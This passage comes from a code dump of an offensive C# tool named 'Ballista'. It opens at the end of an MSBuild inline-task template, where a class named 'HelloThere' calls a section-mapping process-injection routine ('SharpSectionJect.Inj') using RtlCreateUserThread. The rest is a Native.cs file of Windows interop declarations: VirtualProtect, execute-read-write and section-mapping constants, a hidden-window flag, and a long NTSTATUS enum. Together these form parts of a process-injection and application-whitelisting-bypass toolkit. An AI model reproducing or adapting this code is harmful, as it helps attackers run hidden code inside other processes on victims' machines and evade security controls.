140 |                         [DllImport("ntdll.dll", SetLastError = true)]
141 |                         private static extern IntPtr RtlCreateUserThread(IntPtr processHandle, IntPtr threadSecurity, bool createSuspended, Int32 stackZeroBits, IntPtr stackReserved, IntPtr stackCommit, IntPtr startAddress, IntPtr parameter, ref IntPtr threadHandle, IntPtr clientId);
142 |                     }
143 | 	    
144 | 	                public class HelloThere : Task, ITask
145 | 	                {
146 | 	                    public override bool Execute()
147 | 	                    {
148 | 	                        SharpSectionJect.Inj("", "", "");
149 | 	                        return true;
150 | 	                    }
151 | 	                }
152 | 	    
153 |                 ]]>
154 |

155 | 156 | 157 | -------------------------------------------------------------------------------- /Ballista/Ballista/Native.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | 5 | namespace Ballista 6 | { 7 | class Native 8 | { 9 | [DllImport("kernel32.dll")] 10 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 11 | 12 | /* Constants */ 13 | public const uint PAGE_EXECUTE_READ = 0x00000020, 14 | PAGE_EXECUTE_READWRITE = 0x00000040, 15 | PAGE_READWRITE = 0x00000004, 16 | 17 | PROCESS_ACCESS_ALL = 0x001F0FFF, 18 | 19 | SEC_COMMIT = 0x8000000, 20 | 21 | PROCESS_ALL_ACCESS = 0x001F0FFF; 22 | 23 | public const uint NORMAL_PRIORITY_CLASS = 0x0020, 24 | STARTF_USESHOWWINDOW = 0x0001; 25 | 26 | 27 | public const ushort SW_HIDE = 0x0000; 28 | 29 | public const UInt32 SECTION_MAP_WRITE = 0x0002, 30 | SECTION_MAP_READ = 0x0004, 31 | SECTION_MAP_EXECUTE = 0x0008, 32 | 33 | GENERIC_READ = 0x80000000, 34 | GENERIC_WRITE = 0x40000000, 35 | GENERIC_EXECUTE = 0x20000000; 36 | 37 | /* Structs */ 38 | [StructLayout(LayoutKind.Sequential)] 39 | public struct UNICODE_STRING : IDisposable 40 | { 41 | public ushort Length; 42 | public ushort MaximumLength; 43 | private IntPtr buffer; 44 | 45 | public UNICODE_STRING(string s) 46 | { 47 | Length = (ushort)(s.Length * 2); 48 | MaximumLength = (ushort)(Length + 2); 49 | buffer = Marshal.StringToHGlobalUni(s); 50 | } 51 | 52 | public void Dispose() 53 | { 54 | Marshal.FreeHGlobal(buffer); 55 | buffer = IntPtr.Zero; 56 | } 57 | 58 | public override string ToString() 59 | { 60 | return Marshal.PtrToStringUni(buffer); 61 | } 62 | } 63 | 64 | [StructLayout(LayoutKind.Sequential)] 65 | public struct OBJECT_ATTRIBUTES : IDisposable 66 | { 67 | public int Length; 68 | public IntPtr RootDirectory; 69 | private IntPtr objectName; 70 | public uint Attributes; 71 | public IntPtr SecurityDescriptor; 72 | public IntPtr SecurityQualityOfService; 73 | 74 | public OBJECT_ATTRIBUTES(string name, uint attrs) 75 | { 76 | Length = 0; 77 | RootDirectory = IntPtr.Zero; 78 | objectName = IntPtr.Zero; 79 | Attributes = attrs; 80 | SecurityDescriptor = IntPtr.Zero; 81 | SecurityQualityOfService = IntPtr.Zero; 82 | 83 | Length = Marshal.SizeOf(this); 84 | ObjectName = new UNICODE_STRING(name); 85 | } 86 | 87 | public UNICODE_STRING ObjectName 88 | { 89 | get 90 | { 91 | return (UNICODE_STRING)Marshal.PtrToStructure( 92 | objectName, typeof(UNICODE_STRING)); 93 | } 94 | 95 | set 96 | { 97 | bool fDeleteOld = objectName != IntPtr.Zero; 98 | if (!fDeleteOld) 99 | objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value)); 100 | Marshal.StructureToPtr(value, objectName, fDeleteOld); 101 | } 102 | } 103 | 104 | public void Dispose() 105 | { 106 | if (objectName != IntPtr.Zero) 107 | { 108 | Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING)); 109 | Marshal.FreeHGlobal(objectName); 110 | objectName = IntPtr.Zero; 111 | } 112 | } 113 | } 114 | public struct CLIENT_ID 115 | { 116 | public IntPtr UniqueProcess; 117 | public IntPtr UniqueThread; 118 | } 119 | 120 | [StructLayout(LayoutKind.Sequential)] 121 | public struct SECURITY_ATTRIBUTES 122 | { 123 | public int nLength; 124 | public IntPtr lpSecurityDescriptor; 125 | } 126 | 127 | /* Enums */ 128 | public enum NTSTATUS : uint 129 | { 130 | // Success 131 | Success = 0x00000000, 132 | Wait0 = 0x00000000, 133 | Wait1 = 0x00000001, 134 | Wait2 = 0x00000002, 135 | Wait3 = 0x00000003, 136 | Wait63 = 0x0000003f, 137 | Abandoned = 0x00000080, 138 | AbandonedWait0 = 0x00000080, 139 | AbandonedWait1 = 0x00000081, 140 | AbandonedWait2 = 0x00000082, 141 | AbandonedWait3 = 0x00000083, 142 | AbandonedWait63 = 0x000000bf, 143 | UserApc = 0x000000c0, 144 | KernelApc = 0x00000100, 145 | Alerted = 0x00000101, 146 | Timeout = 0x00000102, 147 | Pending = 0x00000103, 148 | Reparse = 0x00000104, 149 | MoreEntries = 0x00000105, 150 | NotAllAssigned = 0x00000106, 151 | SomeNotMapped = 0x00000107, 152 | OpLockBreakInProgress = 0x00000108, 153 | VolumeMounted = 0x00000109, 154 | RxActCommitted = 0x0000010a, 155 | NotifyCleanup = 0x0000010b, 156 | NotifyEnumDir = 0x0000010c, 157 | NoQuotasForAccount = 0x0000010d, 158 | PrimaryTransportConnectFailed = 0x0000010e, 159 | PageFaultTransition = 0x00000110, 160 | PageFaultDemandZero = 0x00000111, 161 | PageFaultCopyOnWrite = 0x00000112, 162 | PageFaultGuardPage = 0x00000113, 163 | PageFaultPagingFile = 0x00000114, 164 | CrashDump = 0x00000116, 165 | ReparseObject = 0x00000118, 166 | NothingToTerminate = 0x00000122, 167 | ProcessNotInJob = 0x00000123, 168 | ProcessInJob = 0x00000124, 169 | ProcessCloned = 0x00000129, 170 | FileLockedWithOnlyReaders = 0x0000012a, 171 | FileLockedWithWriters = 0x0000012b, 172 | 173 | // Informational 174 | Informational = 0x40000000, 175 | ObjectNameExists = 0x40000000, 176 | ThreadWasSuspended = 0x40000001, 177 | WorkingSetLimitRange = 0x40000002, 178 | ImageNotAtBase = 0x40000003, 179 | RegistryRecovered = 0x40000009, 180 | 181 | // Warning 182 | Warning = 0x80000000, 183 | GuardPageViolation = 0x80000001, 184 | DatatypeMisalignment = 0x80000002, 185 | Breakpoint = 0x80000003, 186 | SingleStep = 0x80000004, 187 | BufferOverflow = 0x80000005, 188 | NoMoreFiles = 0x80000006, 189 | HandlesClosed = 0x8000000a, 190 | PartialCopy = 0x8000000d, 191 | DeviceBusy = 0x80000011, 192 | InvalidEaName = 0x80000013, 193 | EaListInconsistent = 0x80000014, 194 | NoMoreEntries = 0x8000001a, 195 | LongJump = 0x80000026, 196 | DllMightBeInsecure = 0x8000002b, 197 | 198 | // Error 199 | Error = 0xc0000000, 200 | Unsuccessful = 0xc0000001, 201 | NotImplemented = 0xc0000002, 202 | InvalidInfoClass = 0xc0000003, 203 | InfoLengthMismatch = 0xc0000004, 204 | AccessViolation = 0xc0000005, 205 | InPageError = 0xc0000006, 206 | PagefileQuota = 0xc0000007, 207 | InvalidHandle = 0xc0000008, 208 | BadInitialStack = 0xc0000009, 209 | BadInitialPc = 0xc000000a, 210 | InvalidCid = 0xc000000b, 211 | TimerNotCanceled = 0xc000000c, 212 | InvalidParameter = 0xc000000d, 213 | NoSuchDevice = 0xc000000e, 214 | NoSuchFile = 0xc000000f, 215 | InvalidDeviceRequest = 0xc0000010, 216 | EndOfFile = 0xc0000011, 217 | WrongVolume = 0xc0000012, 218 | NoMediaInDevice = 0xc0000013, 219 | NoMemory = 0xc0000017, 220 | NotMappedView = 0xc0000019, 221 | UnableToFreeVm = 0xc000001a, 222 | UnableToDeleteSection = 0xc000001b, 223 | IllegalInstruction = 0xc000001d, 224 | AlreadyCommitted = 0xc0000021, 225 | AccessDenied = 0xc0000022, 226 | BufferTooSmall = 0xc0000023, 227 | ObjectTypeMismatch = 0xc0000024, 228 | NonContinuableException = 0xc0000025, 229 | BadStack = 0xc0000028, 230 | NotLocked = 0xc000002a, 231 | NotCommitted = 0xc000002d, 232 | InvalidParameterMix = 0xc0000030, 233 | ObjectNameInvalid = 0xc0000033, 234 | ObjectNameNotFound = 0xc0000034, 235 | ObjectNameCollision = 0xc0000035, 236 | ObjectPathInvalid = 0xc0000039, 237 | ObjectPathNotFound = 0xc000003a, 238 | ObjectPathSyntaxBad = 0xc000003b, 239 | DataOverrun = 0xc000003c, 240 | DataLate = 0xc000003d, 241 | DataError = 0xc000003e, 242 | CrcError = 0xc000003f, 243 | SectionTooBig = 0xc0000040, 244 | PortConnectionRefused = 0xc0000041, 245 | InvalidPortHandle = 0xc0000042, 246 | SharingViolation = 0xc0000043, 247 | QuotaExceeded = 0xc0000044, 248 | InvalidPageProtection = 0xc0000045, 249 | MutantNotOwned = 0xc0000046, 250 | SemaphoreLimitExceeded = 0xc0000047, 251 | PortAlreadySet = 0xc0000048, 252 | SectionNotImage = 0xc0000049, 253 | SuspendCountExceeded = 0xc000004a, 254 | ThreadIsTerminating = 0xc000004b, 255 | BadWorkingSetLimit = 0xc000004c, 256 | IncompatibleFileMap = 0xc000004d, 257 | SectionProtection = 0xc000004e, 258 | EasNotSupported = 0xc000004f, 259 | EaTooLarge = 0xc0000050, 260 | NonExistentEaEntry = 0xc0000051, 261 | NoEasOnFile = 0xc0000052, 262 | EaCorruptError = 0xc0000053, 263 | FileLockConflict = 0xc0000054, 264 | LockNotGranted = 0xc0000055, 265 | DeletePending = 0xc0000056, 266 | CtlFileNotSupported = 0xc0000057, 267 | UnknownRevision = 0xc0000058, 268 | RevisionMismatch = 0xc0000059, 269 | InvalidOwner = 0xc000005a, 270 | InvalidPrimaryGroup = 0xc000005b, 271 | NoImpersonationToken = 0xc000005c, 272 | CantDisableMandatory = 0xc000005d, 273 | NoLogonServers = 0xc000005e, 274 | NoSuchLogonSession = 0xc000005f, 275 | NoSuchPrivilege = 0xc0000060, 276 | PrivilegeNotHeld = 0xc0000061, 277 | InvalidAccountName = 0xc0000062, 278 | UserExists = 0xc0000063, 279 | NoSuchUser = 0xc0000064, 280 | GroupExists = 0xc0000065, 281 | NoSuchGroup = 0xc0000066, 282 | MemberInGroup = 0xc0000067, 283 | MemberNotInGroup = 0xc0000068, 284 | LastAdmin = 0xc0000069, 285 | WrongPassword = 0xc000006a, 286 | IllFormedPassword = 0xc000006b, 287 | PasswordRestriction = 0xc000006c, 288 | LogonFailure = 0xc000006d, 289 | AccountRestriction = 0xc000006e, 290 | InvalidLogonHours = 0xc000006f, 291 | InvalidWorkstation = 0xc0000070, 292 | PasswordExpired = 0xc0000071, 293 | AccountDisabled = 0xc0000072, 294 | NoneMapped = 0xc0000073, 295 | TooManyLuidsRequested = 0xc0000074, 296 | LuidsExhausted = 0xc0000075, 297 | InvalidSubAuthority = 0xc0000076, 298 | InvalidAcl = 0xc0000077, 299 | InvalidSid = 0xc0000078, 300 | InvalidSecurityDescr = 0xc0000079, 301 | ProcedureNotFound = 0xc000007a, 302 | InvalidImageFormat = 0xc000007b, 303 | NoToken = 0xc000007c, 304 | BadInheritanceAcl = 0xc000007d, 305 | RangeNotLocked = 0xc000007e, 306 | DiskFull = 0xc000007f, 307 | ServerDisabled = 0xc0000080, 308 | ServerNotDisabled = 0xc0000081, 309 | TooManyGuidsRequested = 0xc0000082, 310 | GuidsExhausted = 0xc0000083, 311 | InvalidIdAuthority = 0xc0000084, 312 | AgentsExhausted = 0xc0000085, 313 | InvalidVolumeLabel = 0xc0000086, 314 | SectionNotExtended = 0xc0000087, 315 | NotMappedData = 0xc0000088, 316 | ResourceDataNotFound = 0xc0000089, 317 | ResourceTypeNotFound = 0xc000008a, 318 | ResourceNameNotFound = 0xc000008b, 319 | ArrayBoundsExceeded = 0xc000008c, 320 | FloatDenormalOperand = 0xc000008d, 321 | FloatDivideByZero = 0xc000008e, 322 | FloatInexactResult = 0xc000008f, 323 | FloatInvalidOperation = 0xc0000090, 324 | FloatOverflow = 0xc0000091, 325 | FloatStackCheck = 0xc0000092, 326 | FloatUnderflow = 0xc0000093, 327 | IntegerDivideByZero = 0xc0000094, 328 | IntegerOverflow = 0xc0000095, 329 | PrivilegedInstruction = 0xc0000096, 330 | TooManyPagingFiles = 0xc0000097, 331 | FileInvalid = 0xc0000098, 332 | InstanceNotAvailable = 0xc00000ab, 333 | PipeNotAvailable = 0xc00000ac, 334 | InvalidPipeState = 0xc00000ad, 335 | PipeBusy = 0xc00000ae, 336 | IllegalFunction = 0xc00000af, 337 | PipeDisconnected = 0xc00000b0, 338 | PipeClosing = 0xc00000b1, 339 | PipeConnected = 0xc00000b2, 340 | PipeListening = 0xc00000b3, 341 | InvalidReadMode = 0xc00000b4, 342 | IoTimeout = 0xc00000b5, 343 | FileForcedClosed = 0xc00000b6, 344 | ProfilingNotStarted = 0xc00000b7, 345 | ProfilingNotStopped = 0xc00000b8, 346 | NotSameDevice = 0xc00000d4, 347 | FileRenamed = 0xc00000d5, 348 | CantWait = 0xc00000d8, 349 | PipeEmpty = 0xc00000d9, 350 | CantTerminateSelf = 0xc00000db, 351 | InternalError = 0xc00000e5, 352 | InvalidParameter1 = 0xc00000ef, 353 | InvalidParameter2 = 0xc00000f0, 354 | InvalidParameter3 = 0xc00000f1, 355 | InvalidParameter4 = 0xc00000f2, 356 | InvalidParameter5 = 0xc00000f3, 357 | InvalidParameter6 = 0xc00000f4, 358 | InvalidParameter7 = 0xc00000f5, 359 | InvalidParameter8 = 0xc00000f6, 360 | InvalidParameter9 = 0xc00000f7, 361 | InvalidParameter10 = 0xc00000f8, 362 | InvalidParameter11 = 0xc00000f9, 363 | InvalidParameter12 = 0xc00000fa, 364 | MappedFileSizeZero = 0xc000011e, 365 | TooManyOpenedFiles = 0xc000011f, 366 | Cancelled = 0xc0000120, 367 | CannotDelete = 0xc0000121, 368 | InvalidComputerName = 0xc0000122, 369 | FileDeleted = 0xc0000123, 370 | SpecialAccount = 0xc0000124, 371 | SpecialGroup = 0xc0000125, 372 | SpecialUser = 0xc0000126, 373 | MembersPrimaryGroup = 0xc0000127, 374 | FileClosed = 0xc0000128, 375 | TooManyThreads = 0xc0000129, 376 | ThreadNotInProcess = 0xc000012a, 377 | TokenAlreadyInUse = 0xc000012b, 378 | PagefileQuotaExceeded = 0xc000012c, 379 | CommitmentLimit = 0xc000012d, 380 | InvalidImageLeFormat = 0xc000012e, 381 | InvalidImageNotMz = 0xc000012f, 382 | InvalidImageProtect = 0xc0000130, 383 | InvalidImageWin16 = 0xc0000131, 384 | LogonServer = 0xc0000132, 385 | DifferenceAtDc = 0xc0000133, 386 | SynchronizationRequired = 0xc0000134, 387 | DllNotFound = 0xc0000135, 388 | IoPrivilegeFailed = 0xc0000137, 389 | OrdinalNotFound = 0xc0000138, 390 | EntryPointNotFound = 0xc0000139, 391 | ControlCExit = 0xc000013a, 392 | PortNotSet = 0xc0000353, 393 | DebuggerInactive = 0xc0000354, 394 | CallbackBypass = 0xc0000503, 395 | PortClosed = 0xc0000700, 396 | MessageLost = 0xc0000701, 397 | InvalidMessage = 0xc0000702, 398 | RequestCanceled = 0xc0000703, 399 | RecursiveDispatch = 0xc0000704, 400 | LpcReceiveBufferExpected = 0xc0000705, 401 | LpcInvalidConnectionUsage = 0xc0000706, 402 | LpcRequestsNotAllowed = 0xc0000707, 403 | ResourceInUse = 0xc0000708, 404 | ProcessIsProtected = 0xc0000712, 405 | VolumeDirty = 0xc0000806, 406 | FileCheckedOut = 0xc0000901, 407 | CheckOutRequired = 0xc0000902, 408 | BadFileType = 0xc0000903, 409 | FileTooLarge = 0xc0000904, 410 | FormsAuthRequired = 0xc0000905, 411 | VirusInfected = 0xc0000906, 412 | VirusDeleted = 0xc0000907, 413 | TransactionalConflict = 0xc0190001, 414 | InvalidTransaction = 0xc0190002, 415 | TransactionNotActive = 0xc0190003, 416 | TmInitializationFailed = 0xc0190004, 417 | RmNotActive = 0xc0190005, 418 | RmMetadataCorrupt = 0xc0190006, 419 | TransactionNotJoined = 0xc0190007, 420 | DirectoryNotRm = 0xc0190008, 421 | CouldNotResizeLog = 0xc0190009, 422 | TransactionsUnsupportedRemote = 0xc019000a, 423 | LogResizeInvalidSize = 0xc019000b, 424 | RemoteFileVersionMismatch = 0xc019000c, 425 | CrmProtocolAlreadyExists = 0xc019000f, 426 | TransactionPropagationFailed = 0xc0190010, 427 | CrmProtocolNotFound = 0xc0190011, 428 | TransactionSuperiorExists = 0xc0190012, 429 | TransactionRequestNotValid = 0xc0190013, 430 | TransactionNotRequested = 0xc0190014, 431 | TransactionAlreadyAborted = 0xc0190015, 432 | TransactionAlreadyCommitted = 0xc0190016, 433 | TransactionInvalidMarshallBuffer = 0xc0190017, 434 | CurrentTransactionNotValid = 0xc0190018, 435 | LogGrowthFailed = 0xc0190019, 436 | ObjectNoLongerExists = 0xc0190021, 437 | StreamMiniversionNotFound = 0xc0190022, 438 | StreamMiniversionNotValid = 0xc0190023, 439 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 440 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 441 | CantCreateMoreStreamMiniversions = 0xc0190026, 442 | HandleNoLongerValid = 0xc0190028, 443 | NoTxfMetadata = 0xc0190029, 444 | LogCorruptionDetected = 0xc0190030, 445 | CantRecoverWithHandleOpen = 0xc0190031, 446 | RmDisconnected = 0xc0190032, 447 | EnlistmentNotSuperior = 0xc0190033, 448 | RecoveryNotNeeded = 0xc0190034, 449 | RmAlreadyStarted = 0xc0190035, 450 | FileIdentityNotPersistent = 0xc0190036, 451 | CantBreakTransactionalDependency = 0xc0190037, 452 | CantCrossRmBoundary = 0xc0190038, 453 | TxfDirNotEmpty = 0xc0190039, 454 | IndoubtTransactionsExist = 0xc019003a, 455 | TmVolatile = 0xc019003b, 456 | RollbackTimerExpired = 0xc019003c, 457 | TxfAttributeCorrupt = 0xc019003d, 458 | EfsNotAllowedInTransaction = 0xc019003e, 459 | TransactionalOpenNotAllowed = 0xc019003f, 460 | TransactedMappingUnsupportedRemote = 0xc0190040, 461 | TxfMetadataAlreadyPresent = 0xc0190041, 462 | TransactionScopeCallbacksNotSet = 0xc0190042, 463 | TransactionRequiredPromotion = 0xc0190043, 464 | CannotExecuteFileInTransaction = 0xc0190044, 465 | TransactionsNotFrozen = 0xc0190045, 466 | 467 | MaximumNtStatus = 0xffffffff 468 | } 469 | 470 | } 471 | } 472 | --------------------------------------------------------------------------------